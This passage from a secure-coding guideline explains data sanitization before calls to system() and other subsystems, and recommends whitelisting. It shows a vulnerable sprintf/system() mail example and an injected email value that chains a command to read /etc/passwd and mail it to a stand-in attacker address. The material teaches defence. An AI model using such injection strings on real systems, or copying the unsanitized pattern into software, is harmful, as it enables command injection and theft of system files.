...
- command processor via a call to
system()
or similar function - relational databases
- third-party COTS components (e.g., an enterprise resource planning subsystem)
Data sanitization requires an understanding of the data being passed and the capabilities of the subsystem. John Viega and Matt Messier provide an example of an application
that inputs an email address into a buffer and then uses this string as an argument in a call to system()
Viega 03:
Code Block |
---|
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);
|
The risk is, of course, that the user enters the following string as an email address:
Code Block |
---|
bogus@addr.com; cat /etc/passwd | mail some@badguy.net
|
It is necessary to ensure that all valid data is accepted while potentially dangerous data is rejected or sanitized. This can be difficult when vald characters or sequences of characters also have special meanining to the subsystem. In cases where there is no overlap, white listing can be used to eliminate dangerous characters from the data.
The white listing approach to data sanatization is to define a list of acceptable characters and remove any character that is not acceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. The following example, based on the tcp_wrappers
package written by Wietse Venema, illustrates white listing approach:
...
The benefit of white listing is that a programmer can be certain that a
string contains only characters that are considered safe by the programmer.
White listing is recommended over black listing because, instead of having
to trap all unacceptable characters, the programmer only needs to ensure that
acceptable characters are identified. As a result, the programmer can be less
concerned about which characters an attacker may try in an attempt to bypass
security checks.
References
Priority: P9 Level: L1
Failure to sanatize data passed to a complex subsystem can lead to an injection attack, data integrity issues, and a loss of sensitive data.
Component | Value |
---|---|
Severity | 2 (medium) |
Likelihood | 3 (likely) |
Remediation cost | 3 (low) |
References
- Viega 03 Viega, John and Messier, Matt. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003 (ISBN: 0-596-00394-3).
- ISO/IEC 9899-1999 Section 7.20.4.6 The system function